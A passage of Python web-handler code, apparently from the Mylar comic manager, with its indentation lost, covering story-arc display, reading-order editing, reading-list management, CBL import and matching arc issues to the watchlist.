sdir = mylar.CONFIG.GRABBAG_DIR
if len(issref) > 0:
helpers.updatearc_locs(StoryArcID, issref)
arcinfo = myDB.select("SELECT * from storyarcs WHERE StoryArcID=? AND NOT Manual IS 'deleted' order by ReadingOrder ASC", [StoryArcID])
arcdetail = self.storyarc_main(arcid=arcinfo[0]['CV_ArcID'])
storyarcbanner = None
#bannerheight = 400
#bannerwidth = 263
filepath = None
sb = 'cache/storyarcs/' + str(arcinfo[0]['CV_ArcID']) + '-banner'
storyarc_imagepath = os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs')
if not os.path.exists(storyarc_imagepath):
try:
os.mkdir(storyarc_imagepath)
except:
logger.warn('Unable to create storyarc image directory @ %s' % storyarc_imagepath)
if os.path.exists(storyarc_imagepath):
dir = os.listdir(storyarc_imagepath)
for fname in dir:
if str(arcinfo[0]['CV_ArcID']) in fname:
storyarcbanner = sb
filepath = os.path.join(storyarc_imagepath, fname)
# if any(['H' in fname, 'W' in fname]):
# if 'H' in fname:
# bannerheight = int(fname[fname.find('H')+1:fname.find('.')])
# elif 'W' in fname:
# bannerwidth = int(fname[fname.find('W')+1:fname.find('.')])
# if any([bannerwidth != 263, 'W' in fname]):
# #accomodate poster size
# storyarcbanner += 'W' + str(bannerheight)
# else:
# #for actual banner width (ie. 960x280)
# storyarcbanner += 'H' + str(bannerheight)
storyarcbanner += os.path.splitext(fname)[1] + '?' + datetime.datetime.now().strftime('%y-%m-%d %H:%M:%S')
break
template = 'storyarc_detail.html'
if filepath is not None:
import get_image_size
image = get_image_size.get_image_metadata(filepath)
imageinfo = json.loads(get_image_size.Image.to_str_json(image))
#logger.fdebug('imageinfo: %s' % imageinfo)
if imageinfo['width'] > imageinfo['height']:
template = 'storyarc_detail.html'
bannerheight = '280'
bannerwidth = '960'
else:
template = 'storyarc_detail.poster.html'
bannerwidth = '263'
bannerheight = '400'
else:
bannerheight = '280'
bannerwidth = '960'
return serve_template(templatename=template, title="Detailed Arc list", readlist=arcinfo, storyarcname=StoryArcName, storyarcid=StoryArcID, cvarcid=cvarcid, sdir=sdir, arcdetail=arcdetail, storyarcbanner=storyarcbanner, bannerheight=bannerheight, bannerwidth=bannerwidth, spanyears=spanyears)
detailStoryArc.exposed = True
def order_edit(self, id, value):
storyarcid = id[:id.find('.')]
issuearcid = id[id.find('.') +1:]
readingorder = value
#readingorder = value
valid_readingorder = None
#validate input here for reading order.
try:
if int(readingorder) >= 0:
valid_readingorder = int(readingorder)
if valid_readingorder == 0:
valid_readingorder = 1
except ValueError:
logger.error('Non-Numeric/Negative readingorder submitted. Rejecting due to sequencing error.')
return
if valid_readingorder is None:
logger.error('invalid readingorder supplied. Rejecting due to sequencing error')
return
myDB = db.DBConnection()
readchk = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=? AND NOT Manual is 'deleted' ORDER BY ReadingOrder", [storyarcid])
if readchk is None:
logger.error('Cannot edit this for some reason (Cannot locate Storyarc) - something is wrong.')
return
new_readorder = []
oldreading_seq = None
logger.fdebug('[%s] Issue to renumber sequence from : %s' % (issuearcid, valid_readingorder))
reading_seq = 1
for rc in sorted(readchk, key=itemgetter('ReadingOrder'), reverse=False):
filename = None
if rc['Location'] is not None:
filename = ntpath.basename(rc['Location'])
if str(issuearcid) == str(rc['IssueArcID']):
logger.fdebug('new order sequence detected at #: %s' % valid_readingorder)
if valid_readingorder > int(rc['ReadingOrder']):
oldreading_seq = int(rc['ReadingOrder'])
else:
oldreading_seq = int(rc['ReadingOrder']) + 1
reading_seq = valid_readingorder
issueid = rc['IssueID']
IssueArcID = issuearcid
elif int(rc['ReadingOrder']) < valid_readingorder:
logger.fdebug('keeping issue sequence of order #: %s' % rc['ReadingOrder'])
reading_seq = int(rc['ReadingOrder'])
issueid = rc['IssueID']
IssueArcID = rc['IssueArcID']
elif int(rc['ReadingOrder']) >= valid_readingorder:
if oldreading_seq is not None:
if valid_readingorder <= len(readchk):
reading_seq = int(rc['ReadingOrder'])
#reading_seq = oldreading_seq
else:
#valid_readingorder
if valid_readingorder < oldreading_seq:
reading_seq = int(rc['ReadingOrder'])
else:
reading_seq = oldreading_seq +1
logger.fdebug('old sequence discovered at %s to %s' % (oldreading_seq, reading_seq))
oldreading_seq = None
elif int(rc['ReadingOrder']) == valid_readingorder:
reading_seq = valid_readingorder +1
else:
reading_seq +=1 #valid_readingorder + (int(rc['ReadingOrder']) - valid_readingorder) +1
issueid = rc['IssueID']
IssueArcID = rc['IssueArcID']
logger.fdebug('reordering existing sequence as lower sequence has changed. Altering from %s to %s' % (rc['ReadingOrder'], reading_seq))
new_readorder.append({'IssueArcID': IssueArcID,
'IssueID': issueid,
'ReadingOrder': reading_seq,
'filename': filename})
#we resequence in the following way:
# everything before the new reading number stays the same
# everything after the new reading order gets incremented
# add in the new reading order at the desired sequence
# check for empty spaces (missing numbers in sequence) and fill them in.
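#intended behaviour, roughly: with an arc ordered 1..5, moving the issue currently at 5 to order 2
#should leave order 1 untouched and bump the issues previously at 2, 3 and 4 down to 3, 4 and 5.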
logger.fdebug('new reading order: %s' % new_readorder)
#newrl = 0
for rl in sorted(new_readorder, key=itemgetter('ReadingOrder'), reverse=False):
if rl['filename'] is not None:
try:
if int(rl['ReadingOrder']) != int(rl['filename'][:rl['filename'].find('-')]) and mylar.CONFIG.READ2FILENAME is True:
logger.fdebug('Order-Change: %s TO %s' % (int(rl['filename'][:rl['filename'].find('-')]), int(rl['ReadingOrder'])))
logger.fdebug('%s to %s' % (rl['filename'], helpers.renamefile_readingorder(rl['ReadingOrder']) + '-' + rl['filename'][rl['filename'].find('-')+1:]))
except:
pass
rl_ctrl = {"IssueID": rl['IssueID'],
"IssueArcID": rl['IssueArcID'],
"StoryArcID": storyarcid}
r1_new = {"ReadingOrder": rl['ReadingOrder']}
myDB.upsert("storyarcs", r1_new, rl_ctrl)
logger.info('Successfully updated reading order for the story arc.')
return value
order_edit.exposed = True
def manual_arc_add(self, manual_issueid, manual_readingorder, storyarcid, x=None, y=None):
logger.fdebug('IssueID to be attached : ' + str(manual_issueid))
logger.fdebug('StoryArcID : ' + str(storyarcid))
logger.fdebug('Reading Order # : ' + str(manual_readingorder))
threading.Thread(target=helpers.manualArc, args=[manual_issueid, manual_readingorder, storyarcid]).start()
raise cherrypy.HTTPRedirect("detailStoryArc?StoryArcID=%s" % storyarcid)
manual_arc_add.exposed = True
def markreads(self, action=None, **args):
sendtablet_queue = []
myDB = db.DBConnection()
for IssueID in args:
if IssueID is None or 'issue_table' in IssueID or 'issue_table_length' in IssueID:
continue
else:
mi = myDB.selectone("SELECT * FROM readlist WHERE IssueID=?", [IssueID]).fetchone()
if mi is None:
continue
else:
comicname = mi['ComicName']
if action == 'Downloaded':
logger.fdebug(u"Marking %s #%s as %s" % (comicname, mi['Issue_Number'], action))
read = readinglist.Readinglist(IssueID)
read.addtoreadlist()
elif action == 'Read':
logger.fdebug(u"Marking %s #%s as %s" % (comicname, mi['Issue_Number'], action))
self.markasRead(IssueID)
elif action == 'Added':
logger.fdebug(u"Marking %s #%s as %s" % (comicname, mi['Issue_Number'], action))
read = readinglist.Readinglist(IssueID=IssueID)
read.addtoreadlist()
elif action == 'Remove':
logger.fdebug('Deleting %s #%s' % (comicname, mi['Issue_Number']))
myDB.action('DELETE from readlist WHERE IssueID=?', [IssueID])
elif action == 'Send':
logger.fdebug('Queuing ' + mi['Location'] + ' to send to tablet.')
sendtablet_queue.append({"filepath": mi['Location'],
"issueid": IssueID,
"comicid": mi['ComicID']})
if len(sendtablet_queue) > 0:
read = readinglist.Readinglist(sendtablet_queue)
threading.Thread(target=read.syncreading).start()
markreads.exposed = True
def removefromreadlist(self, IssueID=None, StoryArcID=None, IssueArcID=None, AllRead=None, ArcName=None, delete_type=None, manual=None):
myDB = db.DBConnection()
if IssueID:
myDB.action('DELETE from readlist WHERE IssueID=?', [IssueID])
logger.info("[DELETE-READ-ISSUE] Removed " + str(IssueID) + " from Reading List")
elif StoryArcID:
logger.info('[DELETE-ARC] Removing ' + ArcName + ' from your Story Arc Watchlist')
myDB.action('DELETE from storyarcs WHERE StoryArcID=?', [StoryArcID])
#ArcName should be an optional flag so that it doesn't remove arcs that have identical naming (ie. Secret Wars)
if delete_type:
if ArcName:
logger.info('[DELETE-STRAGGLERS-OPTION] Removing all traces of arcs with the name of : ' + ArcName)
myDB.action('DELETE from storyarcs WHERE StoryArc=?', [ArcName])
else:
logger.warn('[DELETE-STRAGGLERS-OPTION] No ArcName provided - just deleting by Story Arc ID')
stid = 'S' + str(StoryArcID) + '_%'
#delete from the nzblog so it will always find the most current downloads. Nzblog has issueid, but starts with ArcID
myDB.action('DELETE from nzblog WHERE IssueID LIKE ?', [stid])
logger.info("[DELETE-ARC] Removed " + str(StoryArcID) + " from Story Arcs.")
elif IssueArcID:
if manual == 'added':
myDB.action('DELETE from storyarcs WHERE IssueArcID=?', [IssueArcID])
else:
myDB.upsert("storyarcs", {"Manual": 'deleted'}, {"IssueArcID": IssueArcID})
#myDB.action('DELETE from storyarcs WHERE IssueArcID=?', [IssueArcID])
logger.info("[DELETE-ARC] Removed " + str(IssueArcID) + " from the Story Arc.")
elif AllRead:
myDB.action("DELETE from readlist WHERE Status='Read'")
logger.info("[DELETE-ALL-READ] Removed All issues that have been marked as Read from Reading List")
removefromreadlist.exposed = True
def markasRead(self, IssueID=None, IssueArcID=None):
read = readinglist.Readinglist(IssueID, IssueArcID)
read.markasRead()
markasRead.exposed = True
def addtoreadlist(self, IssueID):
read = readinglist.Readinglist(IssueID=IssueID)
read.addtoreadlist()
return
#raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % readlist['ComicID'])
addtoreadlist.exposed = True
def importReadlist(self, filename):
from xml.dom.minidom import parseString, Element
import random
myDB = db.DBConnection()
file = open(filename)
data = file.read()
file.close()
dom = parseString(data)
# of results
storyarc = dom.getElementsByTagName('Name')[0].firstChild.wholeText
tracks = dom.getElementsByTagName('Book')
i = 1
node = dom.documentElement
logger.fdebug("there are " + str(len(tracks)) + " issues in the story-arc: " + str(storyarc))
#generate a random number for the ID, and tack on the total issue count to the end as a str :)
storyarcid = str(random.randint(1000, 9999)) + str(len(tracks))
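#illustrative: a randint of 4271 with 12 books in the cbl gives storyarcid '427112'; each issue then
#gets an IssueArcID of the form '<storyarcid>_<random 4-digit>' further down.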
i = 1
for book_element in tracks:
st_issueid = str(storyarcid) + "_" + str(random.randint(1000, 9999))
comicname = book_element.getAttribute('Series')
logger.fdebug("comic: " + comicname)
comicnumber = book_element.getAttribute('Number')
logger.fdebug("number: " + str(comicnumber))
comicvolume = book_element.getAttribute('Volume')
logger.fdebug("volume: " + str(comicvolume))
comicyear = book_element.getAttribute('Year')
logger.fdebug("year: " + str(comicyear))
CtrlVal = {"IssueArcID": st_issueid}
NewVals = {"StoryArcID": storyarcid,
"ComicName": comicname,
"IssueNumber": comicnumber,
"SeriesYear": comicvolume,
"IssueYear": comicyear,
"StoryArc": storyarc,
"ReadingOrder": i,
"TotalIssues": len(tracks)}
myDB.upsert("storyarcs", NewVals, CtrlVal)
i+=1
# Now we either load in all of the issue data for series' already on the watchlist,
# or we dynamically load them from CV and write to the db.
#this loads in all the series' that have multiple entries in the current story arc.
Arc_MultipleSeries = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=? AND IssueID is NULL GROUP BY ComicName HAVING (COUNT(ComicName) > 1)", [storyarcid])
if Arc_MultipleSeries is None:
logger.info('Detected 0 series that have multiple entries in this Story Arc. Continuing.')
else:
AMS = []
for Arc_MS in Arc_MultipleSeries:
logger.fdebug('Arc_MS: %s' % Arc_MS)
#the purpose of this loop is to loop through the multiple entries, pulling out the lowest & highest issue numbers
#along with the publication years in order to help the auto-detector attempt to figure out what the series is on CV.
#.schema storyarcs
#(StoryArcID TEXT, ComicName TEXT, IssueNumber TEXT, SeriesYear TEXT, IssueYEAR TEXT, StoryArc TEXT, TotalIssues TEXT,
# Status TEXT, inCacheDir TEXT, Location TEXT, IssueArcID TEXT, ReadingOrder INT, IssueID TEXT);
AMS.append({"StoryArcID": Arc_MS['StoryArcID'],
"ComicName": Arc_MS['ComicName'],
"SeriesYear": Arc_MS['SeriesYear'],
"IssueYear": Arc_MS['IssueYear'],
"IssueID": Arc_MS['IssueID'],
"highvalue": '0',
"lowvalue": '9999',
"yearRANGE": [str(Arc_MS['SeriesYear'])]}) #Arc_MS['SeriesYear']})
for MSCheck in AMS:
thischk = myDB.select('SELECT * FROM storyarcs WHERE ComicName=? AND SeriesYear=?', [MSCheck['ComicName'], MSCheck['SeriesYear']])
for tchk in thischk:
if helpers.issuedigits(tchk['IssueNumber']) > helpers.issuedigits(MSCheck['highvalue']):
for key in MSCheck.keys():
if key == "highvalue":
MSCheck[key] = tchk['IssueNumber']
if helpers.issuedigits(tchk['IssueNumber']) < helpers.issuedigits(MSCheck['lowvalue']):
for key in MSCheck.keys():
if key == "lowvalue":
MSCheck[key] = tchk['IssueNumber']
logger.fdebug(str(tchk['IssueYear']))
logger.fdebug(MSCheck['yearRANGE'])
if str(tchk['IssueYear']) not in str(MSCheck['yearRANGE']):
for key in MSCheck.keys():
if key == "yearRANGE":
MSCheck[key].append(str(tchk['IssueYear']))
#write out here
#logger.fdebug(str(MSCheck))
#now we load in the list without the multiple entries (ie. series that appear only once in the cbl and don't have an IssueID)
Arc_Issues = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=? AND IssueID is NULL GROUP BY ComicName HAVING (COUNT(ComicName) = 1)", [storyarcid])
if Arc_Issues is None:
logger.fdebug('No individual series detected within the Reading list (series that only appear once).')
else:
logger.fdebug('Detected series that occur only once in the Reading List.')
for AI in Arc_Issues:
logger.fdebug('Detected ' + AI['ComicName'] + ' (' + AI['SeriesYear'] + ') #' + AI['IssueNumber'])
AMS.append({"StoryArcID": AI['StoryArcID'],
"ComicName": AI['ComicName'],
"SeriesYear": AI['SeriesYear'],
"IssueYear": AI['IssueYear'],
"IssueID": AI['IssueID'],
"highvalue": AI['IssueNumber'],
"lowvalue": AI['IssueNumber'],
"yearRANGE": AI['IssueYear']})
logger.fdebug('AMS:' + str(AMS))
logger.fdebug('I need to now try to populate ' + str(len(AMS)) + ' series.')
Arc_Data = []
for duh in AMS:
mode='series'
sresults = mb.findComic(duh['ComicName'], mode, issue=duh['highvalue'], limityear=duh['yearRANGE'])
type='comic'
if len(sresults) == 1:
sr = sresults[0]
logger.info('Only one result...automagik-mode enabled for ' + duh['ComicName'] + ' :: ' + str(sr['comicid']) + ' :: Publisher : ' + str(sr['publisher']))
issues = mylar.cv.getComic(sr['comicid'], 'issue')
isscnt = len(issues['issuechoice'])
logger.info('isscnt : ' + str(isscnt))
chklist = myDB.select('SELECT * FROM storyarcs WHERE StoryArcID=? AND ComicName=? AND SeriesYear=?', [duh['StoryArcID'], duh['ComicName'], duh['SeriesYear']])
if chklist is None:
logger.error('I did not find anything in the Story Arc. Something is probably wrong.')
continue
else:
n = 0
while (n <= isscnt):
try:
islval = issues['issuechoice'][n]
except IndexError:
break
for d in chklist:
if islval['Issue_Number'] == d['IssueNumber']:
logger.info('[' + str(islval['Issue_ID']) + '] matched on Issue Number for ' + duh['ComicName'] + ' #' + str(d['IssueNumber']))
logger.info('I should write these dates: ' + islval['Issue_Date'] + ' -- ' + islval['Store_Date'])
Arc_Data.append({"StoryArcID": duh['StoryArcID'],
"IssueArcID": d['IssueArcID'],
"ComicID": islval['Comic_ID'],
"IssueID": islval['Issue_ID'],
"Issue_Number": islval['Issue_Number'],
"Issue_Date": islval['Issue_Date'],
"Publisher": sr['publisher'],
"Store_Date": islval['Store_Date']})
break
n+=1
#the below cresults will auto-add and cycle through until all are added to watchlist
#cresults = importer.addComictoDB(sr['comicid'],"no",None)
else:
logger.fdebug('Returning results to screen - more than one possibility.')
resultset = 0
logger.info('I need to update ' + str(len(Arc_Data)) + ' issues in this Reading List with CV Issue Data.')
if len(Arc_Data) > 0:
for AD in Arc_Data:
newCtrl = {"IssueArcID": AD['IssueArcID']}
newVals = {"ComicID": AD['ComicID'],
"IssueID": AD['IssueID'],
"Publisher": AD['Publisher'],
"IssueDate": AD['Issue_Date'],
"ReleaseDate": AD['Store_Date']}
myDB.upsert("storyarcs", newVals, newCtrl)
raise cherrypy.HTTPRedirect("detailStoryArc?StoryArcID=%s&StoryArcName=%s" % (storyarcid, storyarc))
importReadlist.exposed = True
def ArcWatchlist(self,StoryArcID=None):
myDB = db.DBConnection()
if StoryArcID:
ArcWatch = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=?", [StoryArcID])
else:
ArcWatch = myDB.select("SELECT * FROM storyarcs")
if ArcWatch is None:
logger.info("No Story Arcs to search")
else:
#cycle through the story arcs here for matches on the watchlist
arcname = ArcWatch[0]['StoryArc']
arcdir = helpers.filesafe(arcname)
arcpub = ArcWatch[0]['Publisher']
if arcpub is None:
arcpub = ArcWatch[0]['IssuePublisher']
lowyear = 9999
maxyear = 0
for la in ArcWatch:
if la['IssueDate'] is None:
continue
else:
if int(la['IssueDate'][:4]) > maxyear:
maxyear = int(la['IssueDate'][:4])
if int(la['IssueDate'][:4]) < lowyear:
lowyear = int(la['IssueDate'][:4])
if maxyear == 0:
spanyears = la['SeriesYear']
elif lowyear == maxyear:
spanyears = str(maxyear)
else:
spanyears = '%s - %s' % (lowyear, maxyear)
logger.info('arcpub: %s' % arcpub)
dstloc = helpers.arcformat(arcdir, spanyears, arcpub)
filelist = None
if dstloc is not None:
if not os.path.isdir(dstloc):
if mylar.CONFIG.STORYARCDIR:
logger.info('Story Arc Directory [%s] does not exist! - attempting to create now.' % dstloc)
else:
logger.info('Story Arc Grab-Bag Directory [%s] does not exist! - attempting to create now.' % dstloc)
checkdirectory = filechecker.validateAndCreateDirectory(dstloc, True)
if not checkdirectory:
logger.warn('Error trying to validate/create directory. Aborting this process at this time.')
return
if all([mylar.CONFIG.CVINFO, mylar.CONFIG.STORYARCDIR]):
if not os.path.isfile(os.path.join(dstloc, "cvinfo")) or mylar.CONFIG.CV_ONETIMER:
logger.fdebug('Generating cvinfo file for story-arc.')
with open(os.path.join(dstloc, "cvinfo"), "w") as text_file:
if any([ArcWatch[0]['StoryArcID'] == ArcWatch[0]['CV_ArcID'], ArcWatch[0]['CV_ArcID'] is None]):
cvinfo_arcid = ArcWatch[0]['StoryArcID']
else:
cvinfo_arcid = ArcWatch[0]['CV_ArcID']
text_file.write('https://comicvine.gamespot.com/storyarc/4045-' + str(cvinfo_arcid))
if mylar.CONFIG.ENFORCE_PERMS:
filechecker.setperms(os.path.join(dstloc, 'cvinfo'))
#get the list of files within the storyarc directory, if any.
if mylar.CONFIG.STORYARCDIR:
fchk = filechecker.FileChecker(dir=dstloc, watchcomic=None, Publisher=None, sarc='true', justparse=True)
filechk = fchk.listFiles()
fccnt = filechk['comiccount']
logger.fdebug('[STORY ARC DIRECTORY] %s files exist within this directory.' % fccnt)
if fccnt > 0:
filelist = filechk['comiclist']
logger.info(filechk)
arc_match = []
wantedlist = []
sarc_title = None
showonreadlist = 1 # 0 won't show storyarcissues on storyarcs main page, 1 will show
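#for each issue in the arc, try to locate the series on the watchlist via its dynamic name, then verify the issue number and series year before accepting the match.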
for arc in ArcWatch:
newStatus = 'Skipped'
if arc['Manual'] == 'deleted':
continue
sarc_title = arc['StoryArc']
logger.fdebug('[%s] %s : %s' % (arc['StoryArc'], arc['ComicName'], arc['IssueNumber']))
matcheroso = "no"
#fc = filechecker.FileChecker(watchcomic=arc['ComicName'])
#modi_names = fc.dynamic_replace(arc['ComicName'])
#mod_arc = re.sub('[\|\s]', '', modi_names['mod_watchcomic'].lower()).strip() #is from the arc db
comics = myDB.select("SELECT * FROM comics WHERE DynamicComicName IN (?) COLLATE NOCASE", [arc['DynamicComicName']])
for comic in comics:
mod_watch = comic['DynamicComicName'] #is from the comics db
if re.sub('[\|\s]','', mod_watch.lower()).strip() == re.sub('[\|\s]', '', arc['DynamicComicName'].lower()).strip():
logger.fdebug("initial name match - confirming issue # is present in series")
if comic['ComicID'][:1] == 'G':
# if it's a multi-volume series, it's decimalized - let's get rid of the decimal.
GCDissue, whocares = helpers.decimal_issue(arc['IssueNumber'])
GCDissue = int(GCDissue) / 1000
if '.' not in str(GCDissue):
GCDissue = '%s.00' % GCDissue
logger.fdebug("issue converted to %s" % GCDissue)
isschk = myDB.selectone("SELECT * FROM issues WHERE Issue_Number=? AND ComicID=?", [str(GCDissue), comic['ComicID']]).fetchone()
else:
issue_int = helpers.issuedigits(arc['IssueNumber'])
logger.fdebug('int_issue = %s' % issue_int)
isschk = myDB.selectone("SELECT * FROM issues WHERE Int_IssueNumber=? AND ComicID=?", [issue_int, comic['ComicID']]).fetchone() #AND STATUS !='Snatched'", [issue_int, comic['ComicID']]).fetchone()
if isschk is None:
logger.fdebug('We matched on name, but issue %s doesn\'t exist for %s' % (arc['IssueNumber'], comic['ComicName']))
else:
#this gets ugly - if the name matches and the issue, it could still be wrong series
#use series year to break it down further.
logger.fdebug('COMIC-comicyear: %s' % comic['ComicYear'])
logger.fdebug('B4-ARC-seriesyear: %s' % arc['SeriesYear'])
if any([arc['SeriesYear'] is None, arc['SeriesYear'] == 'None']):
vy = '2099-00-00'
for x in isschk:
if any([x['IssueDate'] is None, x['IssueDate'] == '0000-00-00']):
sy = x['StoreDate']
if any([sy is None, sy == '0000-00-00']):
continue
else:
sy = x['IssueDate']
if sy < vy:
v_seriesyear = sy
seriesyear = v_seriesyear
logger.info('No Series year set. Discovered & set to %s' % seriesyear)
else:
seriesyear = arc['SeriesYear']
logger.fdebug('ARC-seriesyear: %s' % seriesyear)
if int(comic['ComicYear']) != int(seriesyear):
logger.fdebug('Series years are different - discarding match. %s != %s' % (comic['ComicYear'], seriesyear))
else:
logger.fdebug('issue #: %s is present!' % arc['IssueNumber'])
logger.fdebug('Comicname: %s' % arc['ComicName'])
logger.fdebug('ComicID: %s' % isschk['ComicID'])
logger.fdebug('Issue: %s' % arc['IssueNumber'])
logger.fdebug('IssueArcID: %s' % arc['IssueArcID'])
#gather the matches now.
arc_match.append({
"match_storyarc": arc['StoryArc'],
"match_name": arc['ComicName'],
"match_id": isschk['ComicID'],
"match_issue": arc['IssueNumber'],
"match_issuearcid": arc['IssueArcID'],
"match_seriesyear": comic['ComicYear'],
"match_readingorder": arc['ReadingOrder'],
"match_filedirectory": comic['ComicLocation'], #series directory path
"destination_location": dstloc}) #path to given storyarc / grab-bag directory
matcheroso = "yes"
break
if matcheroso == "no":
logger.fdebug('[NO WATCHLIST MATCH] Unable to find a match for %s :#%s' % (arc['ComicName'], arc['IssueNumber']))
wantedlist.append({
"ComicName": arc['ComicName'],
"IssueNumber": arc['IssueNumber'],
"IssueYear": arc['IssueYear']})
if filelist is not None and mylar.CONFIG.STORYARCDIR:
logger.fdebug('[NO WATCHLIST MATCH] Checking against local Arc directory for given issue.')
fn = 0
valids = [x for x in filelist if re.sub('[\|\s]','', x['dynamic_name'].lower()).strip() == re.sub('[\|\s]','', arc['DynamicComicName'].lower()).strip()]
logger.fdebug('valids: %s' % valids)
if len(valids) > 0:
for tmpfc in valids: #filelist:
haveissue = "no"
issuedupe = "no"
temploc = tmpfc['issue_number'].replace('_', ' ')
fcdigit = helpers.issuedigits(arc['IssueNumber'])
int_iss = helpers.issuedigits(temploc)
if int_iss == fcdigit:
logger.fdebug('%s Issue #%s already present in StoryArc directory' % (arc['ComicName'], arc['IssueNumber']))
#update storyarcs db to reflect status.
rr_rename = False
if mylar.CONFIG.READ2FILENAME:
readorder = helpers.renamefile_readingorder(arc['ReadingOrder'])
if tmpfc['reading_order'] is not None and int(readorder) != int(tmpfc['reading_order']['reading_sequence']):
logger.warn('reading order sequence has changed for this issue from %s to %s' % (tmpfc['reading_order']['reading_sequence'], readorder))
rr_rename = True
dfilename = '%s-%s' % (readorder, tmpfc['reading_order']['filename'])
elif tmpfc['reading_order'] is None:
dfilename = '%s-%s' % (readorder, tmpfc['comicfilename'])
else:
dfilename = '%s-%s' % (readorder, tmpfc['reading_order']['filename'])
else:
dfilename = tmpfc['comicfilename']
if all([tmpfc['sub'] is not None, tmpfc['sub'] != 'None']):
loc_path = os.path.join(tmpfc['comiclocation'], tmpfc['sub'], dfilename)
else:
loc_path = os.path.join(tmpfc['comiclocation'], dfilename)
if rr_rename:
logger.fdebug('Now re-sequencing file to : %s' % dfilename)
os.rename(os.path.join(tmpfc['comiclocation'],tmpfc['comicfilename']), loc_path)
newStatus = 'Downloaded'
newVal = {"Status": newStatus,
"Location": loc_path} #dfilename}
ctrlVal = {"IssueArcID": arc['IssueArcID']}
myDB.upsert("storyarcs", newVal, ctrlVal)
break
else:
newStatus = 'Skipped'
fn+=1
if newStatus == 'Skipped':
#this will set all None Status' to Skipped (at least initially)
newVal = {"Status": "Skipped"}
ctrlVal = {"IssueArcID": arc['IssueArcID']}
myDB.upsert("storyarcs", newVal, ctrlVal)
continue
newVal = {"Status": "Skipped"}
ctrlVal = {"IssueArcID": arc['IssueArcID']}
myDB.upsert("storyarcs", newVal, ctrlVal)
logger.fdebug('%s issues currently exist on your watchlist that are within this arc. Analyzing...' % len(arc_match))
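#for the issues that matched the watchlist, sync status/location from the issues table into storyarcs (and copy the file into the arc directory if configured).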
for m_arc in arc_match:
#now we cycle through the issues looking for a match.
#issue = myDB.selectone("SELECT * FROM issues where ComicID=? and Issue_Number=?", [m_arc['match_id'], m_arc['match_issue']]).fetchone()
issue = myDB.selectone("SELECT a.Issue_Number, a.Status, a.IssueID, a.ComicName, a.IssueDate, a.Location, b.readingorder FROM issues AS a INNER JOIN storyarcs AS b ON a.comicid = b.comicid where a.comicid=? and a.issue_number=?", [m_arc['match_id'], m_arc['match_issue']]).fetchone()
if issue is None: pass
else:
logger.fdebug('issue: %s ... %s' % (issue['Issue_Number'], m_arc['match_issue']))
if issue['Issue_Number'] == m_arc['match_issue']:
logger.fdebug('We matched on %s for %s' % (issue['Issue_Number'], m_arc['match_name']))
if issue['Status'] == 'Downloaded' or issue['Status'] == 'Archived' or issue['Status'] == 'Snatched':
if showonreadlist:
showctrlVal = {"IssueID": issue['IssueID']}
shownewVal = {"ComicName": issue['ComicName'],
"Issue_Number": issue['Issue_Number'],
"IssueDate": issue['IssueDate'],
"SeriesYear": m_arc['match_seriesyear'],
"ComicID": m_arc['match_id']}
myDB.upsert("readlist", shownewVal, showctrlVal)
logger.fdebug('Already have %s : #%s' % (issue['ComicName'], issue['Issue_Number']))
if issue['Location'] is not None:
issloc = os.path.join(m_arc['match_filedirectory'], issue['Location'])
else:
issloc = None
location_path = issloc
if issue['Status'] == 'Downloaded':
#check multiple destination directory usage here.
if not os.path.isfile(issloc):
try:
if all([mylar.CONFIG.MULTIPLE_DEST_DIRS is not None, mylar.CONFIG.MULTIPLE_DEST_DIRS != 'None', os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(m_arc['match_filedirectory'])) != issloc, os.path.exists(os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(m_arc['match_filedirectory'])))]):
issloc = os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(m_arc['match_filedirectory']), issue['Location'])
if not os.path.isfile(issloc):
logger.warn('Source file cannot be located. Please do a Recheck for the specific series to ensure everything is correct.')
continue
except:
pass
logger.fdebug('source location set to : %s' % issloc)
if all([mylar.CONFIG.STORYARCDIR, mylar.CONFIG.COPY2ARCDIR]):
logger.fdebug('Destination location set to : %s' % m_arc['destination_location'])
logger.fdebug('Attempting to copy into StoryArc directory')
#copy into StoryArc directory...
#need to make sure the file being copied over isn't already present in the directory either with a different filename,
#or different reading order.
rr_rename = False
if mylar.CONFIG.READ2FILENAME:
readorder = helpers.renamefile_readingorder(m_arc['match_readingorder'])
if m_arc['match_readingorder'] is not None and int(readorder) != int(m_arc['match_readingorder']):
logger.warn('Reading order sequence has changed for this issue from %s to %s' % (m_arc['match_readingorder'], readorder))
rr_rename = True
dfilename = '%s-%s' % (readorder, issue['Location'])
elif m_arc['match_readingorder'] is None:
dfilename = '%s-%s' % (readorder, issue['Location'])
else:
dfilename = '%s-%s' % (readorder, issue['Location'])
else:
dfilename = issue['Location']
#dfilename = str(readorder) + "-" + issue['Location']
#else:
#dfilename = issue['Location']
dstloc = os.path.join(m_arc['destination_location'], dfilename)
if rr_rename:
logger.fdebug('Now re-sequencing COPIED file to : %s' % dfilename)
os.rename(issloc, dstloc)
if not os.path.isfile(dstloc):
logger.fdebug('Copying %s to %s' % (issloc, dstloc))
try:
fileoperation = helpers.file_ops(issloc, dstloc, arc=True)
if not fileoperation:
raise OSError
except (OSError, IOError):
logger.error('Failed to %s %s - check directories and manually re-run.' % (mylar.CONFIG.FILE_OPTS, issloc))
continue
else:
logger.fdebug('Destination file exists: %s' % dstloc)
location_path = dstloc
else:
location_path = issloc
ctrlVal = {"IssueArcID": m_arc['match_issuearcid']}
newVal = {'Status': issue['Status'],
'IssueID': issue['IssueID'],
'Location': location_path}
myDB.upsert("storyarcs",newVal,ctrlVal)
else:
logger.fdebug('We don\'t have %s : #%s' % (issue['ComicName'], issue['Issue_Number']))
ctrlVal = {"IssueArcID": m_arc['match_issuearcid']}
newVal = {"Status": issue['Status'], #"Wanted",
"IssueID": issue['IssueID']}
myDB.upsert("storyarcs", newVal, ctrlVal)
logger.info('Marked %s :#%s as %s' % (issue['ComicName'], issue['Issue_Number'], issue['Status']))
arcstats = self.storyarc_main(StoryArcID)
logger.info('[STORY-ARCS] Completed Missing/Recheck Files for %s [%s / %s]' % (arcname, arcstats['Have'], arcstats['TotalIssues']))
return
ArcWatchlist.exposed = True
def SearchArcIssues(self, **kwargs):
